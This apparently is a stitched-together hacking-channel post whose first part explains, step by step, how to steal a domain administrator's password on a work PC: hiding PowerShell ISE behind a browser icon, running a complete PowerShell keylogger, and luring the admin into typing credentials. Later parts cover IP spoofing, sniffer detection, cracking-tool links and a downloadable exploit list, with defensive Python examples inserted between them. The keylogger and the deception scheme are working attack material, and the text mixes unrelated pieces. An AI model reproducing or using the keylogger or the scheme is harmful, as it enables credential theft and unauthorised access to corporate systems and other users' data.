How to get an admin password on a work PC in an Active Directory domain?
A) We will describe a method by which the admin password can be obtained in your organization's Active Directory domain. It can be used to install and uninstall software, disable antivirus, access many corporate domain resources, access other users' documents on their PCs, and much more. Well, first things first.
!) First, we find the location of the shortcut for the installed PowerShell ISE. It is usually located at C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell. Find the Windows PowerShell ISE file and, in its properties, on the Shortcut tab, change its icon to something inconspicuous, for example a folder icon or the icon (in *.ico format) of software allowed in the organization, for example 1C. I will use the icon of the IE browser, since everyone has it and security policies often do not prohibit its use, because most government sites work correctly on the client side only in it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.
Then open Windows PowerShell ISE and copy the keylogger script code:
#requires -Version 2
function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")
{
# Signatures for API Calls
$ signatures = @ '
[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
public static extern short GetAsyncKeyState (int virtualKeyCode);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int GetKeyboardState (byte [] keystate);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int MapVirtualKey (uint uCode, int uMapType);
[DllImport ("user32.dll", CharSet = CharSet.Auto)]
public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
# load signatures and make members available
$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru
# create output file
$ null = New-Item -Path $ Path -ItemType File -Force
try
{
Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red
# create endless loop. When user presses CTRL + C, finally-block
# executes and shows the collected key presses
while ($ true) {
Start-Sleep -Milliseconds 40
# scan all ASCII codes above 8
for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {
# get current key state
$ state = $ API :: GetAsyncKeyState ($ ascii)
# is key pressed?
if ($ state -eq -32767) {
$ null = [console] :: CapsLock
# translate scan code to real code
$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)
# get keyboard state for virtual keys
$ kbstate = New-Object Byte [] 256
$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)
# prepare a StringBuilder to receive input key
$ mychar = New-Object -TypeName System.Text.StringBuilder
# translate virtual key
$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)
if ($ success)
{
# add key to logger file
[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)
}
}
}
}
}
finally
{
# open logger file in Notepad
notepad $ Path
}
}
# records all key presses until script is aborted by pressing CTRL + C
# will then open the file with collected key codes
Start-KeyLogger
Now we create a request for software installation, or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person to do the work, run our script with the Run Script command or the F5 key and minimize the window.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
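For defenders, the script in the post above leaves a recognisable shape in PowerShell script block logging (event ID 4104): an Add-Type P/Invoke import of user32.dll key-state functions, an endless polling loop and a file write. The following is an added example, not part of the original post; the log records are constructed and abbreviated, and the field names, weights and threshold are assumptions.

```python
import re

# user32.dll functions that the script on this page imports through Add-Type.
KEY_APIS = ("GetAsyncKeyState", "GetKeyboardState", "MapVirtualKey", "ToUnicode")
FILE_WRITES = ("appendalltext", "add-content", "out-file", "set-content")


def normalize(text):
    """Lower-case and strip whitespace and backticks so spacing does not hide tokens."""
    return re.sub(r"[\s`]+", "", text).lower()


def score_script_block(text):
    """Return (score, reasons, core) for the text of one logged script block."""
    flat = normalize(text)
    score, reasons = 0, []
    pinvoke = "dllimport" in flat and "user32" in flat
    if pinvoke:
        score += 2
        reasons.append("P/Invoke import from user32.dll")
    if "add-type" in flat:
        score += 1
        reasons.append("Add-Type compiles inline C#")
    apis = [a for a in KEY_APIS if a.lower() in flat]
    if apis:
        score += len(apis)
        reasons.append("key-state APIs: " + ", ".join(apis))
    if "while($true)" in flat and "start-sleep" in flat:
        score += 1
        reasons.append("endless polling loop")
    if any(w in flat for w in FILE_WRITES):
        score += 1
        reasons.append("writes to a file")
    # Core condition: key state is polled through an imported user32 function.
    core = pinvoke and "GetAsyncKeyState" in apis
    return score, reasons, core


def find_alerts(events, threshold=5):
    """Return one alert per 4104 event that meets the core condition and threshold."""
    alerts = []
    for ev in events:
        if ev.get("id") != 4104:
            continue
        score, reasons, core = score_script_block(ev["text"])
        if core and score >= threshold:
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "score": score, "reasons": reasons})
    return alerts


# Constructed, abbreviated script block records (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 4104, "host": "WS-017", "user": "CORP\\jdoe", "text": r"""$signatures = @'
[DllImport("user32.dll")] public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll")] public static extern int ToUnicode(...);
'@
$API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
while ($true) { Start-Sleep -Milliseconds 40; ... [System.IO.File]::AppendAllText($Path, ...) }"""},
    # Benign: a window-management helper that also imports from user32.dll.
    {"id": 4104, "host": "WS-022", "user": "CORP\\asmith", "text": r"""Add-Type -MemberDefinition
'[DllImport("user32.dll")] public static extern bool SetForegroundWindow(IntPtr hWnd);'
-Name Win -Namespace UI"""},
    # Benign: an admin monitoring loop that writes to a log file.
    {"id": 4104, "host": "SRV-003", "user": "CORP\\svc_mon", "text":
     r"while ($true) { Start-Sleep -Seconds 60; Get-Service Spooler | Out-File C:\Logs\spooler.txt -Append }"},
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert["host"], alert["user"], alert["score"], "; ".join(alert["reasons"]))
```
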
Hackers crack 16-bit passwords within 1 hour, and research on hashed password security:
1) Information security professionals working in antivirus research say that, for hackers, cracking passwords is as straightforward and simple as the passwords our clients use. Avast's Antonín Hýža has been engaged in password security research for many years.
2) He has collected nearly 40,000 password samples and found that only 10% of the passwords in these samples are "beyond the level that can be guessed and cracked under normal circumstances". The rest can be cracked very easily. In these samples, almost no password contains uppercase English characters, although software security experts often remind you to use a mixture of uppercase and lowercase characters in a password (now we finally know why Apple's passwords must contain uppercase, lowercase and numbers). These passwords usually have an average length of 6 characters, and only 52 passwords exceed 12 characters. Special characters are frequently recommended for passwords, but only a handful of people really use them.
3) A hacker group recently tried to crack more than 14,800 random passwords. Each hacker had a success rate of 62% to 90%, and they successfully cracked 90% of the hashes in less than an hour by using a computer cluster. It is reported that the hacker group serves the Ars Technica website. In order to better study the hacking strategy, they also published the method used to crack the passwords. In addition to repeatedly entering passwords on the website, the hacker team also tried to obtain a series of hashed passwords online.
4) Hashing makes it difficult for hackers to get back to the password from the hash table, and it also allows the website to store a series of hashes instead of storing low-security plain text passwords. This means that even if the hashed password is stolen, the real plain text password remains protected.
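Item 4 holds only when the hash is salted and deliberately slow, and item 2's six-character lowercase passwords are exactly the case where a fast unsalted hash gives little protection. The following added example (not from the original post) contrasts the two storage schemes with Python's hashlib; the iteration count, user names and passwords are constructed assumptions.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumed work factor; tune to your hardware


def fast_unsalted(password):
    """Weak scheme: one fast hash, no salt. Equal passwords give equal hashes."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_record(password, iterations=PBKDF2_ITERATIONS):
    """Stronger scheme: per-user random salt and a slow key-derivation function."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify(password, record):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    record["salt"], record["iterations"])
    return hmac.compare_digest(candidate, record["digest"])


def keyspace(length, alphabet_size):
    """Number of candidates an exhaustive search has to cover."""
    return alphabet_size ** length


def exposed_accounts_unsalted(user_hashes, common_passwords):
    """Audit view of an unsalted store: one table, built once, applies to every
    account, so all users who picked a common password are exposed together."""
    table = {fast_unsalted(p) for p in common_passwords}
    return sorted(user for user, h in user_hashes.items() if h in table)


if __name__ == "__main__":
    # Constructed accounts: two users share a short lowercase password.
    unsalted_db = {
        "alice": fast_unsalted("summer"),
        "bob": fast_unsalted("summer"),
        "carol": fast_unsalted("T7#vq!Lm2zR@x"),
    }
    print("identical hashes reveal reuse:", unsalted_db["alice"] == unsalted_db["bob"])
    print("exposed:", exposed_accounts_unsalted(unsalted_db, ["123456", "summer"]))

    rec_a, rec_b = make_record("summer"), make_record("summer")
    print("salted digests differ:", rec_a["digest"] != rec_b["digest"])
    print("verify ok:", verify("summer", rec_a))

    print("6 lowercase chars:", keyspace(6, 26))
    print("12 printable ASCII chars:", keyspace(12, 94))
```
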
What Is IP Spoofing
Data is transferred via the internet through "packets." An IP (Internet Protocol) address is a unique code that each computer has and that identifies the machine these packets are being sent from. IP addresses can be used to identify where a computer is connecting from. In many cases IP look-up services such as whois.com can provide information about who may be using the computer that is associated with an IP address. IP spoofing is the process of using a fake or random IP address in an attempt to mask where a computer is connecting from or which computer is connecting to a network.
Why IP Spoofing Happens
As the internet has grown in scope and usability, so too has the network of individuals who would seek to manipulate internet network protocols for criminal and malicious purposes. Not all cases of IP spoofing are of malevolent intent; for example, some people choose to spoof their IP addresses when going to web sites that they believe have politically or morally questionable content, in fear that their IP address will be saved and they may one day be associated with unpopular causes or viewpoints. However, a significant percentage of IP spoofing happens because those with dubious intent seek to disguise the source of their attacks.
For example, individuals or groups coordinating denial of service (DoS) attacks will often send a barrage of traffic from fake or random IP addresses to certain websites or networks in an attempt to render the server or servers hosting the sites incapable of processing the traffic, thus anonymously shutting down the website or network.
Another common use of IP spoofing is the circumvention of user authentication based on IP address or region. For instance, many corporations use an intranet. In order to access all the content on this intranet, the machines requesting access must have an IP address within a specified valid range, which shows that the machine is recognized as trusted or is being accessed from a trusted location. By spoofing a connection from a trusted machine, individuals are able to bypass this authentication method and illegally access the network.
Ways To Protect Yourself Against IP Spoofing
IP spoofing can allow an outside party to steal sensitive information or inflict damage on your network. Fortunately, there are a few ways that you can protect yourself against this menace.
The first step you should take is to eliminate host-based authentication on your network. Host-based authentication uses the public host key of the client machine to authenticate a user. Rely instead on network encryption, which sends encrypted packets over a network.
https://github.com/greenarmor/Net-Spoofing-tool
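The intranet scenario above trusts any packet whose source address lies in an internal range. As an added example (not from the original article), here is the edge check that complements removing address-based trust: a packet arriving on the external interface must not claim an internal or non-routable source, and an internal segment must not emit foreign sources. The interface names, the trusted range and the packet records are constructed assumptions.

```python
import ipaddress

# Assumed site layout for illustration.
EXTERNAL_IFACES = {"wan0"}
INTERNAL_IFACES = {"lan0"}
TRUSTED_INTRANET = [ipaddress.ip_network("10.20.0.0/16")]

# Sources that can never legitimately arrive from the internet side.
NEVER_FROM_OUTSIDE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]


def classify(packet):
    """Return (verdict, reason) for one packet record {'iface': ..., 'src': ...}."""
    try:
        src = ipaddress.ip_address(packet["src"])
    except ValueError:
        return ("drop", "malformed-source")

    iface = packet["iface"]
    if iface in EXTERNAL_IFACES:
        # Ingress filtering: an outside packet claiming an inside address is forged.
        if any(src in net for net in NEVER_FROM_OUTSIDE):
            return ("drop", "internal-source-on-external-interface")
        return ("accept", "ok")
    if iface in INTERNAL_IFACES:
        # Egress filtering: internal hosts may only send from their assigned range.
        if not any(src in net for net in TRUSTED_INTRANET):
            return ("drop", "foreign-source-on-internal-interface")
        return ("accept", "ok")
    return ("drop", "unknown-interface")


# Constructed packet records; 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges used here as stand-ins for internet hosts.
SAMPLE_PACKETS = [
    {"iface": "wan0", "src": "10.20.5.9"},     # claims to be an intranet host
    {"iface": "wan0", "src": "203.0.113.7"},   # ordinary external client
    {"iface": "lan0", "src": "10.20.5.9"},     # genuine intranet host
    {"iface": "lan0", "src": "198.51.100.4"},  # internal host forging its source
    {"iface": "wan0", "src": "not-an-ip"},
]

if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        print(pkt["iface"], pkt["src"], *classify(pkt))
```

Filtering like this narrows where a forged source can come from; it does not make an IP address a credential, which is why the text's advice to drop host-based trust still applies.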
How to defend against Sniffer attacks?
1) Autosniffer is a tool developed by the well-known hacker organization (now a security company) L0pht. It is used to detect whether any machine on the local network is in promiscuous mode (that is, listening mode).
2) A machine in promiscuous mode has probably been hacked and had a sniffer installed. It is very important for network administrators to know which machines are in promiscuous mode so that they can investigate further.
3) Antisniff version 1.x runs on Windows NT on Ethernet networks and provides a simple, easy-to-use graphical user interface. The tool uses a variety of methods to test whether a remote system is capturing and analyzing data packets that are not addressed to it. These test methods are independent of the operating system itself.
4) Antisniff runs on a segment of the local Ethernet. If it runs in a non-switched Class C network, Antisniff can monitor the entire network; if switches isolate the network by workgroup, each workgroup needs to run its own Antisniff. The reason is that some special tests use invalid Ethernet addresses, and some tests require statistics gathered in promiscuous mode (such as response time, packet loss rate, etc.).
5) Antisniff is very simple to use: select the machine to be checked in the tool's graphical interface and specify the checking frequency. For tests other than the network response time check, each machine returns a definite positive or negative value. A positive value indicates that the machine is in promiscuous mode and may already have a sniffer installed.
6) For the network response time test, it is recommended to calculate a baseline from the values returned the first time, and then check for machines whose results change greatly between the flood and non-flood tests. Once these machines exit promiscuous mode and return to normal operation, the next Antisniff test will record the difference (a positive value) between promiscuous and non-promiscuous mode.
7) Antisniff should be run periodically. The specific period varies according to the site, the network load, the number of machines tested, and site policies.
https://github.com/LYSYyy/AutoSniff
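The response-time check in item 6 comes down to comparing each host's latency without and with a flood of traffic that is not addressed to it, then tracking how the verdict changes between runs. The following added example (not Antisniff's own code) works that comparison through; the round-trip times are constructed, and the thresholds and function names are assumptions.

```python
from statistics import median


def latency_shift(baseline_ms, flood_ms):
    """Return (delta_ms, ratio) between median RTT under flood and at baseline."""
    base, flood = median(baseline_ms), median(flood_ms)
    ratio = flood / base if base > 0 else float("inf")
    return flood - base, ratio


def suspect_hosts(run, min_ratio=3.0, min_delta_ms=2.0):
    """Hosts whose latency rises sharply under flood.

    A NIC in normal mode discards frames not addressed to it in hardware; a
    host in promiscuous mode hands them to the OS and slows down. Both a
    relative and an absolute threshold must be met to limit false positives
    on hosts with very small or noisy baselines.
    """
    flagged = []
    for host, samples in run.items():
        delta, ratio = latency_shift(samples["baseline"], samples["flood"])
        if ratio >= min_ratio and delta >= min_delta_ms:
            flagged.append(host)
    return sorted(flagged)


def status_changes(previous_run, current_run):
    """Compare two periodic runs and report hosts whose verdict changed."""
    before = set(suspect_hosts(previous_run))
    after = set(suspect_hosts(current_run))
    changes = {h: "entered promiscuous mode" for h in after - before}
    changes.update({h: "left promiscuous mode" for h in before - after})
    return changes


# Constructed RTT samples in milliseconds for two periodic runs.
RUN_1 = {
    "10.0.0.11": {"baseline": [0.4, 0.5, 0.4, 0.6, 0.5], "flood": [0.5, 0.6, 0.5, 0.7, 0.6]},
    "10.0.0.23": {"baseline": [0.5, 0.4, 0.5, 0.5, 0.6], "flood": [4.8, 5.2, 6.1, 4.9, 5.5]},
    "10.0.0.40": {"baseline": [1.0, 1.1, 0.9, 1.0, 1.2], "flood": [1.6, 1.4, 1.5, 1.7, 1.5]},
}
RUN_2 = {
    "10.0.0.11": {"baseline": [0.5, 0.5, 0.4, 0.5, 0.6], "flood": [0.6, 0.5, 0.6, 0.6, 0.7]},
    "10.0.0.23": {"baseline": [0.5, 0.5, 0.4, 0.6, 0.5], "flood": [0.6, 0.5, 0.6, 0.7, 0.5]},
    "10.0.0.40": {"baseline": [1.0, 1.0, 1.1, 0.9, 1.1], "flood": [1.5, 1.6, 1.4, 1.5, 1.6]},
}

if __name__ == "__main__":
    print("run 1 suspects:", suspect_hosts(RUN_1))
    print("run 2 suspects:", suspect_hosts(RUN_2))
    print("changes:", status_changes(RUN_1, RUN_2))
```
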
BEST HACKING SNIFFERS:
http://www.monitis.com/
https://www.wireshark.org/
https://www.manageengine.com/products/netflow/
https://www.liveaction.com/products/omnipeek-network-protocol-analyzer/
http://www.tcpdump.org/
https://www.winpcap.org/windump/
https://www.wireshark.org/docs/man-pages/tshark.html
http://www.netresec.com/?page=NetworkMiner
https://www.telerik.com/download/fiddler
https://www.colasoft.com/download/products/capsa_free.php
ALL POPULAR CRACKING TOOLS USED BY HACKERS IN 2020:
https://hashcat.net/hashcat/
https://www.darknet.org.uk/2006/09/brutus-password-cracker-download-brutus-aet2zip-aet2/
http://www.openwall.com/john/
https://www.thc.org/thc-hydra/
http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
http://project-rainbowcrack.com/
http://ophcrack.sourceforge.net/tables.php
http://www.l0phtcrack.com/
http://www.aircrack-ng.org/
ALL THOSE SHELLS FREE:
AIX-0days.txt AIX 4.2 local root vulnerabilities
leehseinloong.cpp Sudoku2 exploit written for Lee Hsien Loong. (.sg PM)
linux-ia32.c Linux Kernel 2.6.32 ia32entry emulation x86_64 exploit
lotus_exp.py Lotus Domino IMAP4 Server Release 6.5.4 win2k remote exploit
mikrotik-jailbreak.txt Mikrotik 6.40 & below "telnet" jailbreak exploit
mirc-DoS-Script.ini Mirc 6.12 & 6.11 denial-of-service IRC script
mobileiron0day.txt MobileIron Virtual Smartphone Platform local root exploit
MobileIronBypass.tgz MobileIron mobile device management jailbreak detection bypass
mulftpdos.zip Serv-U / G6 / WarFTPD denial-of-service exploit in asm
neogeox.txt NeoGeo Gold X games console jailbreak via UART root shell
NetBSD-sa-2016-003-howto-abuse-cpp.png NetBSD 6.1.5 calendar local root exploit PoC
openbsd-0day-cve-2018-14665.sh OpenBSD 6.4 Xorg local root exploit
prdelka-vs-AEP-smartgate.c AEP Smartgate V4.3B arbitrary file download exploit
prdelka-vs-APPLE-chpass.sh OS-X 10.6.3 & below chpass arbitrary file creation exploit
prdelka-vs-APPLE-ptracepanic.c OS-X 10.6.1 & below ptrace() mutex handling kernel panic
prdelka-vs-BSD-ptrace.tar.gz NetBSD 2.1 ptrace() local root exploit
prdelka-vs-CISCO-httpdos.zip Cisco IOS 12.2 & below HTTP denial-of-service exploit
prdelka-vs-CISCO-vpnftp.c Cisco VPN Concentrator 3000 FTP remote exploit
prdelka-vs-GNU-adabas2.txt Adabas D 13.01 SQL injection & directory traversal
prdelka-vs-GNU-adabas.c Adabas D 13.01 local root exploit Linux
prdelka-vs-GNU-chpasswd.c SquirrelMail 3.1 Change_passwd plugin & below local root exploit
prdelka-vs-GNU-citadel.tar.gz Citadel SMTP 7.10 & below remote code execution exploit
prdelka-vs-GNU-exim.c Exim 4.43-r2 & below host_aton() local root exploit (Linux)
prdelka-vs-GNU-lpr.c Slackware 1.01 stack overflow local root exploit (Linux)
prdelka-vs-GNU-mbsebbs.c mbse-bbs 0.70.0 & below local root exploit (Linux)
prdelka-vs-GNU-peercast.c PeerCast v0.1216 remote root exploit (linux)
prdelka-vs-GNU-sudo.c sudo 1.6.8p9 race condition local root exploit (Linux)
prdelka-vs-GNU-tin.c Slackware 1.01 local root exploit (Linux)
prdelka-vs-HPUX-libc.c HP-UX 11.11 & below libc local root exploit (hppa)
prdelka-vs-HPUX-swask.c HP-UX 11.11 & below swask format string local root exploit (hppa)
prdelka-vs-HPUX-swmodify.c HP-UX 11.11 & below swmodify local root exploit (hppa)
prdelka-vs-HPUX-swpackage.c HP-UX 11.11 & below swpackage local root exploit (hppa)
prdelka-vs-http-fuzz.tar.gz HTTP fuzzing tool & example Savant 3.1 vulnerability
prdelka-vs-LINUS-fchown.tar Linux kernel 2.4.x/2.6.6 & below fchown() file ownership exploit
prdelka-vs-MISC-massftp.tar.gz Mass scanning ftp exploiter tool
prdelka-vs-MS-hotmail.txt Microsoft Hotmail Authentication Bypass vulnerability
prdelka-vs-MS-IE-6.0.2800.1106.XPSP1.rar Internet Explorer 6.0 IFRAME Windows XP exploit
prdelka-vs-MS-rshd.tar.gz Windows RSH daemon 1.8 & below remote exploit
prdelka-vs-MS-winzip.c WinZip 10.0.7245 Win32 & below exploit (the one that angered CERT)
prdelka-vs-SCO-enable SCO OpenServer 5.0.7 enable local root exploit
prdelka-vs-SCO-netwarex.c SCO OpenServer 5.0.7 netware printing local "lp" exploit
prdelka-vs-SCO-ptrace.c SCO Unixware 7.1.3 ptrace() linux kernel emulation local root exploit
prdelka-vs-SCO-tcpdos SCO OpenServer 5.0.7 TCP RST denial-of-service exploit
prdelka-vs-SCO-termshx.c SCO OpenServer 5.0.7 termsh local gid "auth" exploit
prdelka-vs-SGI-xrunpriv SGI IRIX 6.5 runpriv local root exploit
prdelka-vs-SUN-sysinfo.c Solaris 10 sysinfo() local kernel memory information leak
prdelka-vs-SUN-telnetd.c Solaris in.telnetd 8.0 & 7.0 remote exploit (sparc)
prdelka-vs-SUN-virtualbox.sh Sun VirtualBox 3.0.6 local root exploit
prdelka-vs-THC-vmap THC vmap DoS exploit
prdelka-vs-UNIX-permissions.tar.gz UNIX file permissions generic directory exploit
DOWNLOAD :
https://github.com/hackerhouse-opensource/exploits